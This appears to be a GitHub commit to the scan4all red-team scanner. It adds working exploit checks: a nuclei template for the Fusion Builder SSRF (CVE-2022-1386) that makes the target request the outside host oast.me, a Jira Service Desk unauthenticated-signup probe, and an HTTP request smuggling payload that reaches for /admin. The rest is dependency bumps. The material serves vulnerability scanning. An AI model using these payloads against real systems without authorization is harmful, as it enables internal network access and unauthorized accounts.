Fixed -np Skip pocs_go check fix by @hktalent in GhostTroops#38

Added Check Smuggling TE_CL by @hktalent Added CVE-2022-1386 jira-servicedesk-signup check poc 2022-07-24
imemaker · Jul 24, 2022 · f128511 · f128511
1 parent 948fabf
commit f128511
Show file tree

Hide file tree

Showing 25 changed files with 509 additions and 48 deletions.
diff --git a/README.md b/README.md
@@ -16,7 +16,7 @@
 <img width="928" alt="image" src="https://user-images.githubusercontent.com/18223385/175768227-098c779b-6c5f-48ee-91b1-c56e3daa9c87.png">
 </h1>
 
-- What is scan4all: integrated vscan, nuclei, ksubdomain, subfinder, etc., fully automated and intelligent
+- What is scan4all: integrated vscan, nuclei, ksubdomain, subfinder, etc., fully automated and intelligent。red team tools
   Code-level optimization, parameter optimization, and individual modules, such as vscan filefuzz, have been rewritten for these integrated projects.
   In principle, do not repeat the wheel, unless there are bugs, problems
 - Cross-platform: based on golang implementation, lightweight, highly customizable, open source, supports Linux, windows, mac os, etc.

diff --git a/README_CN.md b/README_CN.md
@@ -150,6 +150,7 @@ priorityNmap=false ./scan4all -tp http -list allOut.txt -v
 # Work Plan
 - 整合 web-cache-vulnerability-scanner 实现HTTP smuggling 走私、缓存中毒检测
 - 联动 metasploit-framework，在系统已经安装好对前提条件下，配合tmux，并以 macos 环境为最佳实践完成联动
+- 重构 vscan 的代码，目标是直接调用 naabu、httpx 而不是嵌入他们，导致他们的bug难以通过升级包的方式得以解决
 - 整合 更多 fuzzer <!-- gryffin -->,如 联动 sqlmap
 - 整合 chromedp 实现对登陆页面截图，以及对纯js、js架构前端登陆页面进行检测、以及相应爬虫（敏感信息检测、页面爬取）
 - 整合 nmap-go 提高执行效率,动态解析结果流，并融合到当前任务瀑布流中

diff --git a/config/nuclei-templates/cves/2022/CVE-2022-1386.yaml b/config/nuclei-templates/cves/2022/CVE-2022-1386.yaml
@@ -0,0 +1,96 @@
+id: CVE-2022-1386
+
+info:
+  name: WordPress Fusion Builder < 3.6.2 - Unauthenticated SSRF
+  author: akincibor,MantisSTS,calumjelrick
+  severity: critical
+  description: |
+    The plugin, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures.
+  reference:
+    - https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b
+    - https://www.rootshellsecurity.net/rootshell-discovered-a-critical-vulnerability-in-top-wordpress-theme/
+    - https://theme-fusion.com/version-7-6-2-security-update/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-1386
+    cwe-id: CWE-918
+  tags: cve,cve2022,wp,wordpress,ssrf,fusion,themefusion,avada
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Origin: {{BaseURL}}
+        Referer: {{RootURL}}
+
+        action=fusion_form_update_view
+
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268
+        Origin: {{BaseURL}}
+        Referer: {{RootURL}}
+
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="formData"
+
+        email=example%40example.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva
+        cy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="action"
+
+        fusion_form_submit_form_to_url
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="fusion_form_nonce"
+
+        {{fusionformnonce}}
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="form_id"
+
+        0
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="post_id"
+
+        0
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="field_labels"
+
+        {"email":"Email address"}
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="hidden_field_names"
+
+        []
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="fusionAction"
+
+        https://oast.me
+        -----------------------------30259827232283860776499538268
+        Content-Disposition: form-data; name="fusionActionMethod"
+
+        GET
+        -----------------------------30259827232283860776499538268--
+
+    extractors:
+      - type: xpath
+        part: body_1
+        name: fusionformnonce
+        attribute: value
+        xpath:
+          - '//*[@id="fusion-form-nonce-0"]'
+        internal: true
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - 'Interactsh Server'
+
+      - type: status
+        status:
+          - 200
diff --git a/config/nuclei-templates/vulnerabilities/jira/jira-servicedesk-signup.yaml b/config/nuclei-templates/vulnerabilities/jira/jira-servicedesk-signup.yaml
@@ -0,0 +1,54 @@
+id: jira-servicedesk-signup
+
+info:
+  name: Atlassian Jira Service Desk Signup
+  author: TechbrunchFR
+  severity: medium
+  description:
+    This instance of Atlassian JIRA is misconfigured to allow an attacker to sign up (create a new account) just by navigating to the signup page that is accessible at the URL /servicedesk/customer/user/signup. After the attacker has created a new account it's possible for him/her to access the support portal.
+  reference:
+    - https://www.acunetix.com/vulnerabilities/web/atlassian-jira-servicedesk-misconfiguration/
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cwe-id: CWE-287
+  tags: atlassian,servicedesk,jira,confluence
+
+requests:
+  - raw:
+      - |
+        GET /servicedesk/customer/user/signup HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /servicedesk/customer/user/signup HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Origin: {{RootURL}}
+        Referer: {{RootURL}}/servicedesk/customer/user/signup
+
+        {"email":"","fullname":"{{randstr}}","password":"","captcha":"","secondaryEmail":""}
+
+      - |
+        GET /secure/Signup!default.jspa HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /secure/Signup.jspa HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{RootURL}}
+        Referer: {{RootURL}}/secure/Signup.jspa
+
+        email=&fullname={{randstr}}&username=&password=&Signup=Sign+up
+
+    cookie-reuse: true
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        words:
+          - 'signup.validation.errors'
+          - 'signup-username-error'
+        condition: or
diff --git a/go.mod b/go.mod
@@ -20,7 +20,7 @@ require (
 	github.com/projectdiscovery/networkpolicy v0.0.1
 	github.com/remeh/sizedwaitgroup v1.0.0
 	go.uber.org/ratelimit v0.2.0
-	golang.org/x/net v0.0.0-20220708220712-1185a9018129
+	golang.org/x/net v0.0.0-20220722155237-a158d28d115b
 	golang.org/x/sys v0.0.0-20220704084225-05e143d24a9e
 )
 
@@ -69,7 +69,7 @@ require (
 	github.com/projectdiscovery/rawhttp v0.0.8-0.20220526170355-03de6bb78f37
 	github.com/projectdiscovery/sliceutil v0.0.0-20220511171050-c7d9bc5cadd9
 	github.com/projectdiscovery/urlutil v0.0.0-20210805190935-3d83726391c1
-	github.com/projectdiscovery/wappalyzergo v0.0.51
+	github.com/projectdiscovery/wappalyzergo v0.0.52
 	github.com/rs/xid v1.4.0
 	go.etcd.io/bbolt v1.3.6 // indirect
 )

diff --git a/go.sum b/go.sum
@@ -736,8 +736,8 @@ github.com/projectdiscovery/urlutil v0.0.0-20210525140139-b874f06ad921/go.mod h1
 github.com/projectdiscovery/urlutil v0.0.0-20210805190935-3d83726391c1 h1:9dYmONRtwy+xP8UAGHxEQ0cxO3umc9qiFmnYsoDUps4=
 github.com/projectdiscovery/urlutil v0.0.0-20210805190935-3d83726391c1/go.mod h1:oXLErqOpqEAp/ueQlknysFxHO3CUNoSiDNnkiHG+Jpo=
 github.com/projectdiscovery/wappalyzergo v0.0.45/go.mod h1:vS+npIOANv7eKsEtODsyRQt2n1v8VofCwj2gjmq72EM=
-github.com/projectdiscovery/wappalyzergo v0.0.51 h1:/fieWDKZjF2JQy3ScKVEG1UVraqvoS4VbPGorgOhu08=
-github.com/projectdiscovery/wappalyzergo v0.0.51/go.mod h1:1LQBGQVW47tMHxGTxmBK+pAwfsWKSLQMXt/egxGlljo=
+github.com/projectdiscovery/wappalyzergo v0.0.52 h1:AbM+4KEikwgxpeoWg4Gf4KPxkXAeLHSpWyUaNcaW+sQ=
+github.com/projectdiscovery/wappalyzergo v0.0.52/go.mod h1:1LQBGQVW47tMHxGTxmBK+pAwfsWKSLQMXt/egxGlljo=
 github.com/projectdiscovery/yamldoc-go v1.0.2/go.mod h1:7uSxfMXaBmzvw8m5EhOEjB6nhz0rK/H9sUjq1ciZu24=
 github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6 h1:DvWRQpw7Ib2CRL3ogYm/BWM+X0UGPfz1n9Ix9YKgFM8=
 github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6/go.mod h1:8OfZj8p/axkUM/TJoS/O9LDjj/S8u17rxRbqluE9CU4=
@@ -1064,8 +1064,8 @@ golang.org/x/net v0.0.0-20211216030914-fe4d6282115f/go.mod h1:9nx3DQGgdP8bBQD5qx
 golang.org/x/net v0.0.0-20220127200216-cd36cc0744dd/go.mod h1:CfG3xpIq0wQ8r1q4Su4UZFWDARRcnwPjda9FqA0JpMk=
 golang.org/x/net v0.0.0-20220425223048-2871e0cb64e4/go.mod h1:CfG3xpIq0wQ8r1q4Su4UZFWDARRcnwPjda9FqA0JpMk=
 golang.org/x/net v0.0.0-20220520000938-2e3eb7b945c2/go.mod h1:CfG3xpIq0wQ8r1q4Su4UZFWDARRcnwPjda9FqA0JpMk=
-golang.org/x/net v0.0.0-20220708220712-1185a9018129 h1:vucSRfWwTsoXro7P+3Cjlr6flUMtzCwzlvkxEQtHHB0=
-golang.org/x/net v0.0.0-20220708220712-1185a9018129/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
+golang.org/x/net v0.0.0-20220722155237-a158d28d115b h1:PxfKdU9lEEDYjdIzOtC4qFWgkU2rGHdKlKowJSMN9h0=
+golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
 golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
 golang.org/x/oauth2 v0.0.0-20181106182150-f42d05182288/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
 golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=

diff --git a/lib/Const.go b/lib/Const.go
@@ -3,6 +3,7 @@ package lib
 import (
 	"context"
 	"net/http"
+	"os"
 	"regexp"
 	"sync"
 )
@@ -83,7 +84,7 @@ func CheckHeader(header *http.Header, szUrl string) {
 			if 0 < CheckShiroCookie(header) {
 				a1 = append(a1, "shiro")
 			}
-			if 0 < len(a1) {
+			if 0 < len(a1) && os.Getenv("NoPOC") != "true" {
 				PocCheck_pipe <- PocCheck{Wappalyzertechnologies: &a1, URL: szUrl, FinalURL: szUrl, Checklog4j: false}
 			}
 		}

diff --git a/lib/Smuggling/TE_CL.go b/lib/Smuggling/TE_CL.go
@@ -0,0 +1,26 @@
+package Smuggling
+
+import "strings"
+
+var TE_Payload = []string{`GET / HTTP/1.1
+Host: %s
+Transfer-Encoding: chunkedchunked
+
+26
+GET / HTTP/1.1
+Content-Length: 30
+
+
+0
+
+
+GET /admin HTTP/1.1
+
+`}
+
+func init() {
+	for n, x := range TE_Payload {
+		x = strings.ReplaceAll(x, "\n", "\r\n")
+		TE_Payload[n] = x
+	}
+}
diff --git a/lib/Smuggling/runner/CheckSmuggling_TE_CL.go b/lib/Smuggling/runner/CheckSmuggling_TE_CL.go
@@ -0,0 +1,22 @@
+package runner
+
+import (
+	"fmt"
+	"github.com/hktalent/scan4all/lib/Smuggling"
+	"github.com/hktalent/scan4all/lib/socket"
+	"strings"
+)
+
+// check HTTP Request Smuggling
+// https://github.com/nodejs/llhttp/blob/master/src/llhttp/http.ts#L483
+func Check_TE_CL(target string, port int) bool {
+	s1 := socket.NewCheckTarget(target, "tcp", port, 15).SendOnePayload(fmt.Sprintf(Smuggling.TE_Payload[0], fmt.Sprintf("%s:%d", target, port)))
+	if "" != s1 {
+		a := strings.Split(s1, "HTTP/1.1")
+		if 3 <= len(a) {
+			return true
+		}
+	}
+
+	return false
+}
diff --git a/lib/Smuggling/test/docker-compose.yml b/lib/Smuggling/test/docker-compose.yml
@@ -0,0 +1,14 @@
+version: '3'
+
+services:
+  cve202232213:
+    image: node:16-alpine
+    tty: true
+    container_name: cve202232213
+    ports:
+      - "80:80"
+    volumes:
+      - "./:/app"
+
+    entrypoint:
+      - "node /app/testServer.js"
diff --git a/lib/Smuggling/test/testServer.js b/lib/Smuggling/test/testServer.js
@@ -0,0 +1,22 @@
+const http = require('http');
+
+http.createServer((request, response) => {
+    let body = [];
+    request.on('error', (err) => {
+        response.end("error while reading body: " + err)
+    }).on('data', (chunk) => {
+        body.push(chunk);
+    }).on('end', () => {
+        body = Buffer.concat(body).toString();
+
+        response.on('error', (err) => {
+            response.end("error while sending response: " + err)
+        });
+
+        response.end(JSON.stringify({
+            "Headers": request.headers,
+            "Length": body.length,
+            "Body": body,
+        }) + "\n");
+    });
+}).listen(80);